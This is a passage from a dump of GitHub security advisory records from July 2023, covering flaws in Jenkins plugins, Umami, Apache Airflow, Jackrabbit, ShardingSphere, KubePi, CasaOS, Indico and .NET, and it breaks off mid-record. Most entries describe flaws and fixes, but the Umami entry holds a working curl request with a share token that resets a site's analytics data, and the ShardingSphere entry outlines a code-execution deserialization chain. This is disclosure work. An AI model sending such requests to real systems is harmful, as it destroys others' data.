'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33170'}]
|
{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-11T22:45:20Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-4c3q-r84r-q6pp
|
2023-07-20T14:44:14Z
|
2023-07-12T18:30:38Z
| null |
['CVE-2023-37951']
|
Jenkins mabl Plugin vulnerable to exposure of system-scooped credentials
|
Jenkins mabl Plugin 0.0.46 and earlier does not set the appropriate context for credentials lookup, allowing the use of System-scoped credentials otherwise reserved for the global configuration.
This allows attackers with Item/Configure permission to access and capture credentials they are not entitled to.
mabl Plugin 0.0.47 defines the appropriate context for credentials lookup.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.mabl.integration.jenkins:mabl-integration'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.47'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37951'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3137%20(2)'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]
|
{'cwe_ids': ['CWE-522'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:31:31Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-x2ph-qqwm-9cc6
|
2023-07-17T10:48:39Z
|
2023-07-15T21:30:16Z
| null |
['CVE-2023-2507']
|
CleverTap Cordova plugin vulnerable to Cross-site Scripting
|
CleverTap Cordova Plugin version 2.6.2 allows a remote attacker to execute JavaScript code in any application that is opened via a specially constructed deeplink by an attacker.
This is possible because the plugin does not correctly validate the data coming from the deeplinks before using them.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'clevertap-cordova'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.6.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2507'}, {'type': 'WEB', 'url': 'https://fluidattacks.com/advisories/maiden/'}, {'type': 'PACKAGE', 'url': 'https://github.com/CleverTap/clevertap-cordova'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-17T10:48:39Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-8www-cffh-4q98
|
2023-07-28T15:33:14Z
|
2023-07-28T15:33:14Z
| null |
[]
|
Anyone with a share link can RESET all website data in Umami
|
### Summary
Anyone with a share link (permissions to view) can reset the website data.
### Details
When a user navigates to a `/share/` URL, he receives a share token which is used for authentication. This token is later verified by `useAuth`. After the token is verified, the user can call most of the `GET` APIs that allow fetching stats about a website.
The `POST /reset` endpoint is secured using `canViewWebsite` which is the incorrect verification for such destructive action. This makes it possible to completly reset all website data ONLY with view permissions - [permalink](https://github.com/umami-software/umami/blob/7bfbe264852558a148c7741f8637ff2b266d48cd/pages/api/websites/%5Bid%5D/reset.ts#L22)
### PoC
```bash
curl -X POST 'https://analytics.umami.is/api/websites/b8250618-ccb5-47fb-8350-31c96169a198/reset' \
-H 'authority: analytics.umami.is' \
-H 'accept: application/json' \
-H 'accept-language: en-US,en;q=0.9' \
-H 'authorization: Bearer undefined' \
-H 'cache-control: no-cache' \
-H 'content-type: application/json' \
-H 'pragma: no-cache' \
-H 'referer: https://analytics.umami.is/share/bw6MFhkwpwEXFsbd/test' \
-H 'sec-ch-ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"' \
-H 'sec-ch-ua-mobile: ?0' \
-H 'sec-ch-ua-platform: "Linux"' \
-H 'sec-fetch-dest: empty' \
-H 'sec-fetch-mode: cors' \
-H 'sec-fetch-site: same-origin' \
-H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36' \
-H 'x-umami-share-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ3ZWJzaXRlSWQiOiJiODI1MDYxOC1jY2I1LTQ3ZmItODM1MC0zMWM5NjE2OWExOTgiLCJpYXQiOjE2OTAzNjkxOTl9.zTfwFrfggE5na7rOOgkUobEBm48AH_8WVyh2RgJGzcw' \
--compressed
```
You can reproduce this by:
* Accessing a website using it's share link
* Copy the `token` received from the the received from the `GET /share/{website-id}`
* Send a POST request to `https://analytics.umami.is/api/websites/b8250618-ccb5-47fb-8350-31c96169a198/reset` with `x-umami-share-token: ` header equal to the token copied in the previous step
* The website data is now cleared
### Impact
Everyone with an open share link exposed to the internet!
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'umami'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/umami-software/umami/security/advisories/GHSA-8www-cffh-4q98'}, {'type': 'WEB', 'url': 'https://github.com/umami-software/umami/commit/ec48a4e3250e9cefc481b339a90e6ceea6f1ec2b'}, {'type': 'PACKAGE', 'url': 'https://github.com/umami-software/umami'}]
|
{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-28T15:33:14Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-4q2q-q5pw-2342
|
2023-07-25T16:38:48Z
|
2023-07-13T09:30:28Z
| null |
['CVE-2023-37415']
|
Apache Airflow Apache Hive Provider Improper Input Validation vulnerability
|
Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Apache Hive Provider.
Patching on top of CVE-2023-35797
Before 6.1.2 the proxy_user option can also inject semicolon.
This issue affects Apache Airflow Apache Hive Provider: before 6.1.2.
It is recommended updating provider version to 6.1.2 in order to avoid this vulnerability.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-apache-hive'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37415'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/9wx0jlckbnycjh8nj5qfwxo423zvm41k'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/3'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-13T17:01:41Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vx35-f379-4q49
|
2023-07-19T19:29:23Z
|
2023-07-10T21:53:52Z
| null |
['CVE-2023-3574']
|
Pimcore Customer Management Framework vulnerable to Improper Authorization in Rules Controller
|
### Impact
The product performs authorization checks incorrectly when an unauthorized actor tries to access a resource or perform an actions.
The attacker can view and freely perform actions to add, modify, or delete rules.
### Patches
Update to version 3.4.1 or apply this patch manually https://github.com/pimcore/customer-data-framework/commit/f15668c86db254e86ba7ac895bc3cdd1a2a3cc45.patch
### Workarounds
Apply https://github.com/pimcore/customer-data-framework/commit/f15668c86db254e86ba7ac895bc3cdd1a2a3cc45.patch manually.
### References
https://huntr.dev/bounties/1dcb4f01-e668-4aa3-a6a3-838532e500c6/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/customer-management-framework-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-vx35-f379-4q49'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3574'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/customer-data-framework/commit/f15668c86db254e86ba7ac895bc3cdd1a2a3cc45'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/customer-data-framework/commit/f15668c86db254e86ba7ac895bc3cdd1a2a3cc45.patch'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/customer-data-framework'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1dcb4f01-e668-4aa3-a6a3-838532e500c6'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1dcb4f01-e668-4aa3-a6a3-838532e500c6/'}]
|
{'cwe_ids': ['CWE-285', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-10T21:53:52Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-f9g6-fp84-fv92
|
2023-07-19T22:09:38Z
|
2023-07-19T22:09:38Z
| null |
[]
|
impl `FromMdbValue` for bool is unsound
|
The implementation of `FromMdbValue` has several unsoundness issues. First of all, it allows to reinterpret arbitrary bytes as a bool and could make undefined behavior happen with safe function. Secondly, it allows transmuting pointer without taking memory layout into consideration. The details of reproducing the bug are available [here](https://github.com/vhbit/lmdb-rs/issues/67).
|
[]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'lmdb-rs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.6'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/vhbit/lmdb-rs/issues/67'}, {'type': 'PACKAGE', 'url': 'https://github.com/vhbit/lmdb-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0047.html'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-19T22:09:38Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-wvgr-5wgr-c6fj
|
2023-07-20T14:49:19Z
|
2023-07-12T18:30:38Z
| null |
['CVE-2023-37952']
|
Jenkins mabl Plugin vulnerable to cross-site request forgery
|
Jenkins mabl Plugin 0.0.46 and earlier does not perform permission checks in several HTTP endpoints.
This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.
mabl Plugin 0.0.47 requires POST requests and the appropriate permissions for the affected HTTP endpoints.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.mabl.integration.jenkins:mabl-integration'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.47'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37952'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3127'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]
|
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:31:28Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-q8cm-3v62-jj79
|
2023-08-03T17:59:54Z
|
2023-07-25T15:30:26Z
| null |
['CVE-2023-37895']
|
Remote code execution in Apache Jackrabbit
|
Java object deserialization issue in Jackrabbit webapp/standalone on all platforms allows attacker to remotely execute code via RMIVersions up to (including) 2.20.10 (stable branch) and 2.21.17 (unstable branch) use the component "commons-beanutils", which contains a class that can be used for remote code execution over RMI.
Users are advised to immediately update to versions 2.20.11 or 2.21.18. Note that earlier stable branches (1.0.x .. 2.18.x) have been EOLd already and do not receive updates anymore.
In general, RMI support can expose vulnerabilities by the mere presence of an exploitable class on the classpath. Even if Jackrabbit itself does not contain any code known to be exploitable anymore, adding other components to your server can expose the same type of problem. We therefore recommend to disable RMI access altogether (see further below), and will discuss deprecating RMI support in future Jackrabbit releases.
How to check whether RMI support is enabledRMI support can be over an RMI-specific TCP port, and over an HTTP binding. Both are by default enabled in Jackrabbit webapp/standalone.
The native RMI protocol by default uses port 1099. To check whether it is enabled, tools like "netstat" can be used to check.
RMI-over-HTTP in Jackrabbit by default uses the path "/rmi". So when running standalone on port 8080, check whether an HTTP GET request on localhost:8080/rmi returns 404 (not enabled) or 200 (enabled). Note that the HTTP path may be different when the webapp is deployed in a container as non-root context, in which case the prefix is under the user's control.
Turning off RMIFind web.xml (either in JAR/WAR file or in unpacked web application folder), and remove the declaration and the mapping definition for the RemoteBindingServlet:
<servlet>
<servlet-name>RMI</servlet-name>
<servlet-class>org.apache.jackrabbit.servlet.remote.RemoteBindingServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>RMI</servlet-name>
<url-pattern>/rmi</url-pattern>
</servlet-mapping>
Find the bootstrap.properties file (in $REPOSITORY_HOME), and set
rmi.enabled=false
and also remove
rmi.host
rmi.port
rmi.url-pattern
If there is no file named bootstrap.properties in $REPOSITORY_HOME, it is located somewhere in the classpath. In this case, place a copy in $REPOSITORY_HOME and modify it as explained.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.jackrabbit:jackrabbit-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.21.0'}, {'fixed': '2.21.18'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.jackrabbit:jackrabbit-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '2.20.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.jackrabbit:jackrabbit-standalone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.21.0'}, {'fixed': '2.21.18'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.jackrabbit:jackrabbit-standalone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '2.20.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.jackrabbit:jackrabbit-standalone-components'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.21.0'}, {'fixed': '2.21.18'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.jackrabbit:jackrabbit-standalone-components'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '2.20.11'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37895'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/jackrabbit'}, {'type': 'WEB', 'url': 'https://lists.apache.org/list.html?users@jackrabbit.apache.org'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/j03b3qdhborc2jrhdc4d765d3jkh8bfw'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2023/Jul/43'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/25/8'}]
|
{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T19:25:30Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-3cxh-xp3g-jxjm
|
2023-07-28T21:34:04Z
|
2023-07-19T09:30:54Z
| null |
['CVE-2023-28754']
|
Apache ShardingSphere-Agent Deserialization of Untrusted Data vulnerability
|
Deserialization of Untrusted Data vulnerability in Apache ShardingSphere-Agent, which allows attackers to execute arbitrary code by constructing a special YAML configuration file.
The attacker needs to have permission to modify the ShardingSphere Agent YAML configuration file on the target machine, and the target machine can access the URL with the arbitrary code JAR.
An attacker can use SnakeYAML to deserialize java.net.URLClassLoader and make it load a JAR from a specified URL, and then deserialize javax.script.ScriptEngineManager to load code using that ClassLoader. When the ShardingSphere JVM process starts and uses the ShardingSphere-Agent, the arbitrary code specified by the attacker will be executed during the deserialization of the YAML configuration file by the Agent.
This issue affects ShardingSphere-Agent: through 5.3.2. This vulnerability is fixed in Apache ShardingSphere 5.4.0.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.shardingsphere:shardingsphere'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.4.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.3.2'}}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28754'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/shardingsphere'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/p8onhqox5kkwow9lc6gs03z28wtyp1cg'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/19/3'}]
|
{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-20T10:10:02Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-757p-vx43-fp9r
|
2023-07-21T20:18:00Z
|
2023-07-21T20:18:00Z
| null |
['CVE-2023-37917']
|
KubePi Privilege Escalation vulnerability
|
### Summary
A normal user has permission to create/update users, they can become admin by editing the `isadmin` value in the request
### PoC
Change the value of the `isadmin` field in the request to true:
https://drive.google.com/file/d/1e8XJbIFIDXaFiL-dqn0a0b6u7o3CwqSG/preview
### Impact
Elevate user privileges
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:L'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/KubeOperator/kubepi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.5'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/1Panel-dev/KubePi/security/advisories/GHSA-757p-vx43-fp9r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37917'}, {'type': 'WEB', 'url': 'https://drive.google.com/file/d/1e8XJbIFIDXaFiL-dqn0a0b6u7o3CwqSG/preview'}, {'type': 'PACKAGE', 'url': 'https://github.com/1Panel-dev/KubePi'}, {'type': 'WEB', 'url': 'https://github.com/1Panel-dev/KubePi/releases/tag/v1.6.5'}]
|
{'cwe_ids': ['CWE-269'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-21T20:18:00Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-m8v7-469p-5x89
|
2023-07-25T14:44:27Z
|
2023-07-25T14:44:27Z
| null |
[]
|
Hard-coded System User Credentials in Folio Data Export Spring module
|
### Impact
The module creates a system user that is used to perform internal module-to-module operations. Credentials for this user are hard-coded in the source code. This makes it trivial to authenticate as this user, allowing unauthorized read access to these mod-inventory-storage records: instances, holdings, items, contributor-types, identifier-types. This includes records marked as suppressed from discovery.
### Patches
Upgrade mod-remote-storage to >=2.0.3, or a 1.7.x version >=1.7.1.
### Workarounds
No known workarounds.
### References
https://wiki.folio.org/x/hbMMBw - FOLIO Security Advisory with Upgrade Instructions
https://github.com/folio-org/mod-remote-storage/commit/57df495f76e9aa5be9ce7ce3a65f89b6dbcbc13b - Fix
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.folio:mod-remote-storage'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.folio:mod-remote-storage'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/folio-org/mod-remote-storage/security/advisories/GHSA-m8v7-469p-5x89'}, {'type': 'WEB', 'url': 'https://github.com/folio-org/mod-remote-storage/commit/57df495f76e9aa5be9ce7ce3a65f89b6dbcbc13b'}, {'type': 'PACKAGE', 'url': 'https://github.com/folio-org/mod-remote-storage'}, {'type': 'WEB', 'url': 'https://wiki.folio.org/x/hbMMBw'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T14:44:27Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vjh7-5r6x-xh6g
|
2023-07-17T14:36:09Z
|
2023-07-17T14:36:09Z
| null |
['CVE-2023-37265']
|
CasaOS Gateway vulnerable to incorrect identification of source IP addresses
|
### Impact
Unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances.
### Patches
The problem was addressed by improving the detection of client IP addresses in 391dd7f. This patch is part of CasaOS 0.4.4.
### Workarounds
Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.
### References
- 391dd7f
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/IceWhaleTech/CasaOS-Gateway'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.4'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/IceWhaleTech/CasaOS-Gateway/security/advisories/GHSA-vjh7-5r6x-xh6g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37265'}, {'type': 'WEB', 'url': 'https://github.com/IceWhaleTech/CasaOS-Gateway/commit/391dd7f0f239020c46bf057cfa25f82031fc15f7'}, {'type': 'PACKAGE', 'url': 'https://github.com/IceWhaleTech/CasaOS-Gateway'}]
|
{'cwe_ids': ['CWE-306', 'CWE-348'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-17T14:36:09Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-2gpr-j5vj-wvh2
|
2023-07-12T15:48:59Z
|
2023-07-05T09:30:20Z
| null |
['CVE-2023-34150']
|
Apache Any23 vulnerable to excessive memory usage
|
Use of TikaEncodingDetector in Apache Any23 can cause excessive memory usage.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.any23:apache-any23'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.7'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34150'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/any23'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/713tk23khbtbg940pb2ql8ggd4cvh6j1'}]
|
{'cwe_ids': ['CWE-20', 'CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T20:37:32Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vghm-8cjp-hjw6
|
2023-07-18T18:33:51Z
|
2023-07-18T15:30:36Z
| null |
['CVE-2018-25088']
|
postgraas-server vulnerable to SQL injection
|
A vulnerability, which was classified as critical, was found in Blue Yonder postgraas_server up to 2.0.0b2. Affected is the function `_create_pg_connection/create_postgres_db` of the file `postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py` of the component PostgreSQL Backend Handler. The manipulation leads to sql injection. Upgrading to version 2.0.0 is able to address this issue. The patch is identified as 7cd8d016edc74a78af0d81c948bfafbcc93c937c. It is recommended to upgrade the affected component. VDB-234246 is the identifier assigned to this vulnerability.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'postgraas-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-25088'}, {'type': 'WEB', 'url': 'https://github.com/blue-yonder/postgraas_server/commit/7cd8d016edc74a78af0d81c948bfafbcc93c937c'}, {'type': 'PACKAGE', 'url': 'https://github.com/blue-yonder/postgraas_server'}, {'type': 'WEB', 'url': 'https://github.com/blue-yonder/postgraas_server/releases/tag/v2.0.0'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.234246'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.234246'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-18T18:33:51Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-fmqq-25x9-c6hm
|
2023-07-21T21:34:31Z
|
2023-07-21T20:24:10Z
| null |
['CVE-2023-37901']
|
Indico vulnerable to Cross-Site-Scripting via confirmation prompts
|
### Impact
There is a Cross-Site-Scripting vulnerability in confirmation prompts commonly used when deleting content from Indico.
Exploitation requires someone with at least submission privileges (such as a speaker) and then someone else to attempt to delete this content.
Considering that event organizers may want to delete suspicious-looking content when spotting it, there is a non-negligible risk of such an attack to succeed. The risk of this could be further increased when combined with some some social engineering pointing the victim towards this content.
### Patches
You need to update to [Indico 3.2.6](https://github.com/indico/indico/releases/tag/v3.2.6) as soon as possible.
See [the docs](https://docs.getindico.io/en/stable/installation/upgrade/) for instructions on how to update.
### Workarounds
Only let trustworthy users manage categories, create events or upload materials ("submission" privileges on a contribution/event). This should already be the case in a properly-configured setup when it comes to category/event management.
Note that a conference doing a Call for Abstracts actively invites external speakers (who the organizers may not know and thus cannot fully trust) to submit content, hence the need to update to a a fixed version ASAP in particular when using such workflows.
For more information
If you have any questions or comments about this advisory:
* Open a thread in [our forum](https://talk.getindico.io/)
* Email us privately at [indico-team@cern.ch](mailto:indico-team@cern.ch)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'indico'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.6'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/indico/indico/security/advisories/GHSA-fmqq-25x9-c6hm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37901'}, {'type': 'WEB', 'url': 'https://github.com/indico/indico/commit/2ee636d318653fb1ab193803dafbfe3e371d4130'}, {'type': 'WEB', 'url': 'https://docs.getindico.io/en/stable/installation/upgrade/'}, {'type': 'PACKAGE', 'url': 'https://github.com/indico/indico'}, {'type': 'WEB', 'url': 'https://github.com/indico/indico/releases/tag/v3.2.6'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/indico/PYSEC-2023-129.yaml'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-21T20:24:10Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-485r-rp8v-998v
|
2023-07-11T22:45:28Z
|
2023-07-11T22:45:28Z
| null |
['CVE-2023-33127']
|
Microsoft Security Advisory CVE-2023-33127: .NET Remote Code Execution Vulnerability
|
# Microsoft Security Advisory CVE-2023-33127: .NET Remote Code Execution Vulnerability
## <a name="executive-summary"></a>Executive summary
Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.
A vulnerability exists in .NET applications where the diagnostic server can be exploited to achieve cross-session/cross-user elevation of privilege (EoP) and code execution.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/263
### <a name="mitigation-factors"></a>Mitigation factors
Microsoft has not identified any mitigating factors for this vulnerability.
## <a name="affected-software"></a>Affected software
* Any .NET 7.0 application running on .NET 7.0.8 or earlier.
* Any .NET 6.0 application running on .NET 6.0.19 or earlier.
If your application uses the following package versions, ensure you update to the latest version of .NET.
### <a name=".NET 7"></a>.NET 7
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.8 | 7.0.9
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.8 | 7.0.9
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.8 | 7.0.9
### <a name=".NET 6"></a>.NET 6
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
